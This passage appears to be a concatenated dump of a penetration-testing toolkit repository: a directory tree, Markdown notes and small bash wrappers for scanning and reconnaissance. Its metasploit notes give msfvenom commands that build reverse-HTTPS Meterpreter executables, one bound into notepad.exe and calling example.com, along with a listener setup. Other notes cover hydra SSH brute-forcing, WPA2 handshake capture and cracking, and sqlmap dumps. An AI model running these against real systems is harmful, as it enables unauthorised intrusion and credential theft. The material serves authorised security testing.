├── reconnaissance ├── shodan │ └── shodanhat │ │ ├── __init__.py │ │ ├── constantes.py │ │ ├── LICENSE │ │ └── README.md ├── mx.sh ├── nameservers.sh ├── ip.sh ├── zone-transfer.sh ├── webrecon.sh ├── ftp-banner.sh ├── smtp-banner.sh ├── whois.sh ├── ips.sh └── hostname.sh ├── snmp ├── community.lst ├── discover.sh └── scan.sh ├── firewall └── subnetslist.example ├── web ├── lists │ ├── big.list │ └── common-content-types.list ├── js-map-decoder │ ├── package.json │ └── README.md ├── nikto.md ├── robots.sh ├── banner-grabbing-nc.sh ├── banner-grabbing-wget-http.sh ├── robots-ssl.sh ├── banner-grabbing-curl-http.sh ├── web-headers-null.sh ├── screenshot.sh ├── web-headers-malformed-2.sh ├── web-headers-malformed.sh ├── banner-grabbing-nc-http.sh ├── banner-grabbing-nmap-script.sh ├── curl-options.sh ├── banner-grabbing-curl-http-proxy.sh ├── banner-grabbing-nmap-built-in.sh ├── nuclei-scan.sh ├── curl-trace.sh ├── curl-options-proxy.sh ├── curl-robots.sh ├── html-to-png-screenshot.sh ├── nikto-scan.sh ├── web-recon.sh ├── web-app-framework.sh ├── nikto-scan-proxy.sh ├── nikto-scan-useragent.sh ├── dir-scanner.sh ├── nikto-scan-useragent-proxy.sh ├── dir-scanner-gobuster.sh ├── dir-scanner-dirsearch-big.sh ├── dir-scanner-dirsearch-medium.sh ├── curl-get.sh ├── wordpress-scan.sh ├── eyewitness.sh ├── dir-scanner-fine-tuned.sh ├── dir-scanner-proxy.sh └── curl-delete.sh ├── misc ├── port-forwarding.md ├── helpful-commands.md ├── openvas.md ├── print-top-tcp-ports.sh ├── responds-to-ping.sh ├── ssh.md └── print-top-udp-ports.sh ├── metasploit ├── binding.md ├── payloads.md └── multi-handler.md ├── wifi ├── wifi.md └── wpa2.md ├── m365 └── Readme.md ├── README.md ├── cracking ├── Readme.md ├── generate-wordlist.sh ├── generate-wordlist-from-site.sh ├── ssh-bf.sh ├── crunch-pattern.sh ├── anonymous-ftp.sh ├── open-relay-smtp.sh ├── crunch-charset.sh ├── smtp-users-enumeration.sh ├── brute-force-smtp-hydra.sh ├── brute-force-ftp-hydra.sh ├── brute-force-rdp-hydra.sh ├── brute-force-ssh-hydra.sh ├── brute-force-ftp-medusa.sh ├── brute-force-ssh-medusa.sh ├── oracle-login.sh └── brute-force-smtp-medusa.sh ├── skid └── README.md ├── sqli └── sqlmap.md ├── nessus └── extract-info-nessus.md ├── windows └── wmi.md ├── ssl ├── tlssled.sh └── ssl-scan.sh ├── phishing └── dnstwist.sh ├── smb ├── null-session.sh ├── scan-nbtscan.sh ├── scan-smbclient.sh ├── scan-enum4linux.sh ├── scan-list-contents.sh ├── scan-share-permissions.sh └── scan-execute-command.sh ├── sip ├── scanner-svwar.sh └── sip-dos.sh ├── port-scanning ├── tcp │ ├── tcp-ports-scan-nc.sh │ ├── tcp-ports-scan-delay-nc.sh │ ├── full │ │ ├── tcp-ports-scan-full-delay-nc.sh │ │ ├── tcp-ports-scan-full-delay-sequential-fulltcpcon.sh │ │ ├── tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh │ │ ├── tcp-ports-scan-full.sh │ │ ├── tcp-ports-scan-full-nodns.sh │ │ ├── tcp-ports-scan-full-noping.sh │ │ ├── tcp-ports-scan-full-noping-nodns.sh │ │ ├── tcp-ports-scan-full-fast-noping-nodns.sh │ │ ├── tcp-ports-scan-full-maxrate.sh │ │ ├── tcp-ports-scan-full-maxrate-noping.sh │ │ ├── tcp-ports-scan-full-super-fast-noping-nodns.sh │ │ ├── tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh │ │ ├── tcp-ports-scan-full-delay-sequential.sh │ │ └── tcp-ports-scan-full-delay-sequential-noping.sh │ ├── tcp-ports-scan-top1000.sh │ ├── tcp-ports-scan-top1000-noping.sh │ ├── tcp-ports-scan-top1000-noping-nodns.sh │ ├── tcp-ports-scan-top2000-noping-nodns.sh │ ├── tcp-ports-scan-top1000-fast-noping-nodns.sh │ ├── services │ │ ├── tcp-services-scan-top1000-noping.sh │ │ ├── tcp-ports-services-scan-top400-noping.sh │ │ ├── tcp-services-scan-noping.sh │ │ ├── tcp-services-fast-scan-noping.sh │ │ └── tcp-services-super-fast-scan-noping.sh │ ├── tcp-ports-scan-top1000-maxrate-noping.sh │ ├── tcp-ports-scan-top1000-maxrate.sh │ ├── tcp-ports-scan-top1000-slow-noping-nodns.sh │ ├── tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh │ └── tcp-scan-web-server.sh └── udp │ ├── udp-ports-scan-top1000.sh │ ├── udp-ports-scan-top1000-nodns.sh │ ├── udp-ports-scan-top1000-noping.sh │ ├── full │ ├── udp-ports-scan-full.sh │ ├── udp-ports-scan-full-nodns.sh │ ├── udp-ports-scan-full-noping.sh │ ├── udp-ports-scan-full-noping-nodns.sh │ ├── udp-ports-scan-full-fast-noping-nodns.sh │ └── udp-ports-scan-full-super-fast-noping-nodns.sh │ ├── udp-ports-scan-top1000-noping-nodns.sh │ ├── udp-ports-scan-top1000-fast-noping-nodns.sh │ ├── services │ ├── udp-services-scan-top1000-noping.sh │ ├── udp-services-scan-top400-noping.sh │ ├── udp-services-scan-noping.sh │ ├── udp-services-fast-scan-noping.sh │ └── udp-services-super-fast-scan-noping.sh │ └── udp-ports-scan-top1000-super-fast-noping-nodns.sh ├── oracle ├── odat-ping.sh ├── odat-sidguesser.sh ├── odat-status.sh ├── odat-version.sh ├── scanner.sh ├── odat-tnspoison.sh ├── oracle-tnscmd-ping.sh ├── oracle-tnscmd-version.sh └── odat-passwordguesser.sh ├── ldap ├── scan-enum4linux.sh └── scan-ldapsearch.sh ├── grep ├── grep-unique-live-hosts.sh ├── grep-unique-live-hosts-having-more-than-one-port-open.sh ├── grep-unique-live-hosts-comma.sh ├── grep-unique-open-ports.sh ├── grep-unique-open-ports-comma.sh ├── grep-list-hosts-and-open-ports-to-csv.sh ├── grep-list-hosts-and-open-ports-to-matrix.sh ├── grep-list-hosts-and-open-ports-to-txt.sh ├── grep-list-hosts-open-ports-and-services-to-matrix.sh └── grep-list-hosts-open-ports-and-services-to-txt.sh ├── live-hosts ├── ping-from-linux.sh ├── discover-local-live-hosts-passively-p0f.sh ├── discover-local-live-hosts-netbios.sh └── discover-local-live-hosts-netdiscover.sh ├── smtp └── user-enum.sh └── applocker └── Readme.md /reconnaissance/shodan/shodanhat/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /snmp/community.lst: -------------------------------------------------------------------------------- 1 | public 2 | private 3 | manager 4 | -------------------------------------------------------------------------------- /reconnaissance/shodan/shodanhat/constantes.py: -------------------------------------------------------------------------------- 1 | SHODAN_API_KEY = "" -------------------------------------------------------------------------------- /firewall/subnetslist.example: -------------------------------------------------------------------------------- 1 | 192.168.1.1/24 2 | 192.168.2.1/23 3 | 192.168.3.1/27 -------------------------------------------------------------------------------- /web/lists/big.list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maldevel/PenTestKit/HEAD/web/lists/big.list -------------------------------------------------------------------------------- /misc/port-forwarding.md: -------------------------------------------------------------------------------- 1 | ## Port Forwarding 2 | 3 | ### Linux Port Forwarding 4 | 5 | * rinetd 6 | -------------------------------------------------------------------------------- /web/js-map-decoder/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "source-map": "^0.7.4" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /misc/helpful-commands.md: -------------------------------------------------------------------------------- 1 | ## Helpful commands during PT 2 | 3 | **duplicate the end of each line at the end of line itself** 4 | 5 | ```bash 6 | paste -d ' ' filename1 filename1 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /metasploit/binding.md: -------------------------------------------------------------------------------- 1 | ## File Binding 2 | 3 | ### Executable files 4 | 5 | ```bash 6 | msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe 7 | ``` 8 | -------------------------------------------------------------------------------- /wifi/wifi.md: -------------------------------------------------------------------------------- 1 | ## WiFi Notes 2 | 3 | ### Debian 4 | 5 | * Add a "non-free" component to /etc/apt/sources.list 6 | 7 | ```bash 8 | sudo apt-get install firmware-atheros 9 | ``` 10 | 11 | [ath9k_htc](https://wiki.debian.org/ath9k_htc) 12 | -------------------------------------------------------------------------------- /m365/Readme.md: -------------------------------------------------------------------------------- 1 | ### Generate possible usernames 2 | 3 | Take a name and transform it into possible username permutations: 4 | 5 | * https://gist.github.com/superkojiman/11076951 6 | 7 | ``` 8 | python3 namemash.py real_names.txt > permutations.txt 9 | ``` 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## PenTestKit 2 | 3 | *Useful tools & scripts during Penetration Testing Engagements* 4 | 5 | *** 6 | 7 | ### Download - Installation 8 | 9 | ```bash 10 | git clone https://github.com/maldevel/PenTestKit.git 11 | cd PenTestKit/ 12 | ``` 13 | -------------------------------------------------------------------------------- /cracking/Readme.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 3 | ### Detecting SSH and Brute-forcing it 4 | 5 | ```sh 6 | nmap -p 22 --open -oG live_hosts.txt x.y.z.0/24 7 | grep "Up" live_hosts.txt | awk '{print $2}' > ips.txt 8 | hydra -l Administrator -P passwords.lst -M ips.txt ssh -t 4 9 | ``` 10 | 11 | --- 12 | -------------------------------------------------------------------------------- /misc/openvas.md: -------------------------------------------------------------------------------- 1 | ## OpenVAS 2 | 3 | ### Initializing & Starting OpenVAS 4 | 5 | ```bash 6 | apt-get install openvas 7 | openvas-setup 8 | openvas-start 9 | ``` 10 | 11 | * https://127.0.0.1:9392 12 | 13 | ``` 14 | Username: admin 15 | Password: OpenVAS setup script 16 | ``` 17 | -------------------------------------------------------------------------------- /skid/README.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 3 | ### SKID mode 4 | 5 | ``` 6 | chmod a+x -R PenTestKit/grep 7 | chmod a+x -R PenTestKit/live-hosts 8 | chmod a+x -R PenTestKit/generate-scripts-lists 9 | chmod a+x scan-external-ip-range.sh 10 | sudo ./scan-external-ip-range.sh x.x.x.x/yy 11 | ``` 12 | 13 | --- 14 | -------------------------------------------------------------------------------- /web/lists/common-content-types.list: -------------------------------------------------------------------------------- 1 | application/javascript 2 | application/json 3 | application/x-www-form-urlencoded 4 | application/pdf 5 | application/xml 6 | application/zip 7 | audio/mpeg 8 | audio/vorbis 9 | multipart/form-data 10 | text/css 11 | text/html 12 | text/plain 13 | image/png 14 | image/jpeg 15 | image/gif 16 | -------------------------------------------------------------------------------- /web/nikto.md: -------------------------------------------------------------------------------- 1 | ## Nikto 2 | 3 | ### Scanning an HTTPS target using a HTTP proxy 4 | 5 | * Edit nikto.conf 6 | 7 | ``` 8 | nano /etc/nikto.conf 9 | ``` 10 | 11 | * Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay``` 12 | 13 | ``` 14 | nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080 15 | ``` 16 | -------------------------------------------------------------------------------- /metasploit/payloads.md: -------------------------------------------------------------------------------- 1 | ## Payload Generation 2 | 3 | ### Reverse https meterpreter 4 | 5 | ```bash 6 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe 7 | ``` 8 | 9 | ```bash 10 | msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe 11 | ``` 12 | -------------------------------------------------------------------------------- /web/js-map-decoder/README.md: -------------------------------------------------------------------------------- 1 | # Javascript Map Decoder 2 | 3 | In order to use this script, put all the map files in the `map` folder. The scripts respects the application's folder structure and will create all necessary folders. Decoded files will be placed in the `source-code` folder. 4 | 5 | To run the script run: 6 | 7 | ```bash 8 | git clone 9 | npm install 10 | node decode-source-map.js 11 | ``` -------------------------------------------------------------------------------- /sqli/sqlmap.md: -------------------------------------------------------------------------------- 1 | ## SQLmap notes 2 | 3 | ### Get database schema 4 | 5 | * Microsoft SQL Server 6 | * Error-base 7 | * POST 8 | * Burp Pro proxy 9 | * Specific database 10 | 11 | ```bash 12 | sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /nessus/extract-info-nessus.md: -------------------------------------------------------------------------------- 1 | ## Nessus Information 2 | 3 | * Export Scan results as a csv file. 4 | 5 | ### Export Critical Vulnerabilities 6 | 7 | ```bash 8 | cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 9 | ``` 10 | 11 | ### Export High Vulnerabilities 12 | 13 | ```bash 14 | cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 15 | ``` 16 | 17 | ### Export Medium Vulnerabilities 18 | 19 | ```bash 20 | cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 21 | ``` 22 | 23 | ### Export Low Vulnerabilities 24 | 25 | ```bash 26 | cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /wifi/wpa2.md: -------------------------------------------------------------------------------- 1 | ## WPA2 WiFi Hacking 2 | 3 | ### Enable monitor mode on wireless interface 4 | 5 | **List wireless interfaces supporting monitor mode** 6 | 7 | ```bash 8 | airmon-ng 9 | ``` 10 | 11 | **Enable monitor mode** 12 | 13 | ```bash 14 | airmon-ng start wlan0 15 | ``` 16 | 17 | ### Scan for WiFi networks 18 | 19 | ```bash 20 | airodump-ng wlan0mon 21 | ``` 22 | 23 | ### Packet Capture 24 | 25 | ```bash 26 | airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon 27 | ``` 28 | 29 | ### Inject packets/Capture Handshake 30 | 31 | ```bash 32 | aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon 33 | ``` 34 | 35 | ### Cracking 36 | 37 | ```bash 38 | aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /windows/wmi.md: -------------------------------------------------------------------------------- 1 | ## Windows Management Instrumentation 2 | 3 | ### Get SID of a local user 4 | 5 | ``` 6 | wmic useraccount where name='username' get sid 7 | ``` 8 | 9 | 10 | ### Get SID for current logged in user 11 | 12 | ``` 13 | wmic useraccount where name='%username%' get sid 14 | ``` 15 | 16 | ### Get SID for current logged in domain user 17 | 18 | ``` 19 | whoami /user 20 | ``` 21 | 22 | ### Get SID for the local administrator of the computer 23 | 24 | ``` 25 | wmic useraccount where (name='administrator' and domain='%computername%') get name,sid 26 | ``` 27 | 28 | ### Get SID for the domain administrator 29 | 30 | ``` 31 | wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid 32 | ``` 33 | 34 | ### Find username from a SID 35 | 36 | ``` 37 | wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name 38 | ``` 39 | 40 | -------------------------------------------------------------------------------- /metasploit/multi-handler.md: -------------------------------------------------------------------------------- 1 | ## Multi Handler 2 | 3 | ### Run metasploit multi handler 4 | 5 | ```bash 6 | msfconsole 7 | use exploit/multi/handler 8 | set PAYLOAD windows/meterpreter/reverse_https 9 | set LHOST example.com 10 | set LPORT 443 11 | ``` 12 | 13 | ### Session will never timeout 14 | 15 | ```bash 16 | set SessionCommunicationTimeout 0 17 | ``` 18 | 19 | ### Execute commands on new session connection 20 | 21 | ```bash 22 | set autorunscript multi_console_command -cl "screenshot","sysinfo" 23 | ``` 24 | 25 | ### Don’t exit once the first meterpreter connection is established 26 | 27 | ```bash 28 | set ExitOnSession false 29 | ``` 30 | 31 | ### Run all meterpreter connections in the background automatically 32 | 33 | ```bash 34 | exploit -j 35 | ``` 36 | 37 | ### List sessions 38 | 39 | ```bash 40 | sessions -l 41 | ``` 42 | 43 | ### Interact with a shell 44 | 45 | ```bash 46 | sessions -i 5 47 | ``` 48 | 49 | ### Send interaction with session 5 to background 50 | 51 | Press ctrl+z 52 | -------------------------------------------------------------------------------- /ssl/tlssled.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2025 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | tlssled $1 $2 26 | else 27 | echo "Please provide the host and the port." 28 | fi 29 | -------------------------------------------------------------------------------- /reconnaissance/mx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host -t mx $1 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /phishing/dnstwist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2024 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | dnstwist $1 27 | else 28 | echo "Please provide the target Domain name." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/null-session.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | rpcclient -U "" -N $1 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/robots.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | wget "http://$1/robots.txt" 27 | else 28 | echo "Please provide target host." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/nameservers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host -t ns $1 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-nc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nc -v $1 $2 27 | else 28 | echo "Please provide a target host and a port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-wget-http.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | curl "$1" -q -S 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/ip.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host $1|grep "has address"|cut -d" " -f4 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/zone-transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | host -l $1 $2 27 | else 28 | echo "Please provide a target host and a nameserver." 29 | fi 30 | -------------------------------------------------------------------------------- /sip/scanner-svwar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | svwar -D -m INVITE -p $2 $1 27 | else 28 | echo "Please provide the target host and port." 29 | fi 30 | -------------------------------------------------------------------------------- /snmp/discover.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | nmap -sU --open -p 161 $1 27 | else 28 | echo "Please provide a target host or a target ip range." 29 | fi 30 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-nc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nc -z -n -v $1 $2 27 | else 28 | echo "Please provide a host and a port range." 29 | fi 30 | -------------------------------------------------------------------------------- /smb/scan-nbtscan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU 